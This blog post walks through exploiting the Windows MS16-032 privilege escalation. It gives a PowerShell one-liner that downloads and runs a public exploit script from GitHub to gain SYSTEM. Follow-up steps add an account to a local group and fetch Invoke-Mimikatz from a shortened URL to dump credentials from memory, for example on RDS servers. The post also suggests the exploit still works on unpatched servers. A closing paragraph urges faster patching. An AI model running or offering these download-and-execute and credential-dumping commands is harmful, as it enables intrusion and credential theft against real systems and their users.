MS16-032 Try this at home!

@BertWolters asked me several times to post a blog on the SCUG website, about a nice security topic. Today is the day to take some time to write a Blog Post about Patch Tuesday.

Every IT Professional knows about Patch Tuesday. Every month a whole list of security fixes are available. Most of the times it is just a list, but how cool is it, to really test the vulnerabilities yourself ? This gives the list a whole new meaning!

In the Patch Tuesday of March there was a vulnerability which is numbered MS16-032. With this vulnerability you can become Local System from a standard user context. Let’s see this in action. I think you can exploit this vulnerability still on some servers (and RDS Servers) because servers are normally patched after some weeks after patch Tuesday. Most System Administrators are afraid that Microsoft calls back a patch because of some problems with a patch. Nobody wants to have some free problems extra

Let’s start with some information about the MS16-032 vulnerability:

It is listed on the Microsoft website : MS16-032. There is a bug with creating a secondary logon session, the whole technical details are written in this blog post. For now we just want to see it in action!

There is someone who wrote a script in Powershell to demonstrate this vulnerability, To try it yourself do the following:

1. start a command shell
2. start powershell
3. execute powershell script directly from github with the followinf command:
Invoke-Expression(Invoke-WebRequest(“https://raw.githubusercontent.com/FuzzySecurity/PowerShell-Suite/master/Invoke-MS16-032.ps1”));Invoke-MS16-032;

MS16-032-

After that you will get a new commandshell with system level privileges

LocalSystem:

Okay, and what to do next ? Here some things you could do:

1. add yourself (or a new account) as local admin
net localgroup users domainname\username /add

2. start mimikatz powershell to harvest some credentials left in memory (especially you was logged on a RDS Server)
powershell “IEX (New-Object Net.WebClient).DownloadString(‘http://is.gd/oeoFuI’); Invoke-Mimikatz -DumpCreds

So, this is why you should patch your infrasructure as fast as possible to fix this kind of vulnerabilities. Most system administrators wait a few weeks before applying patches to their systems, because they are afraid that patching a system can cause some serious problems. *not paching either in my opinion from a security perspective*. In my opinion you don’t manage the standard updates, but you have to manage the exceptions and have to implement an effectiv way to revoke Windows updates which causes troubles.

Oh and last but not least, there is also a win32 application of this exploit, which works like a charm on Windows XP and Windows 2003 systems, which can’t be patched anymore, just saying.

If you have any questions, feel free to contact me at www.twitter.com/erikloef

 

 

 

 

 

 

 

 

 

 

It's only fair to share...Tweet about this on TwitterShare on LinkedIn0Share on Google+0Share on Facebook0